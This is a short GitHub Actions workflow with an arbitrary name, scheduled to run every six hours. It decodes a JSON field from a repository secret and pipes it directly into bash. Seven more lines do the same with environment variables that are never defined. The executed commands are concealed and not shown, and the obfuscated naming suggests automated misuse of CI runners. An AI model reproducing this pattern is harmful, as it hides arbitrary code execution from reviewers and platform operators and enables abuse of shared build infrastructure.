name: adolescentacademic
on:
  workflow_dispatch:
  schedule:
    - cron: '45 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: adolescentacademic
        env:
          mbc166: ${{ secrets.mbc166 }}
        run: |
          echo $mbc166 | jq -r .z2 | /bin/bash
          echo $f42000 | jq -r .neuaz01639 | /bin/bash
          echo $hzocv881 | jq -r .oggtz07811 | /bin/bash
          echo $q9 | jq -r .j1365 | /bin/bash
          echo $vmihf012 | jq -r .kz9754 | /bin/bash
          echo $urxg8042 | jq -r .eshj41 | /bin/bash
          echo $c94 | jq -r .mwr8 | /bin/bash
          echo $klx073 | jq -r .wi4893 | /bin/bash

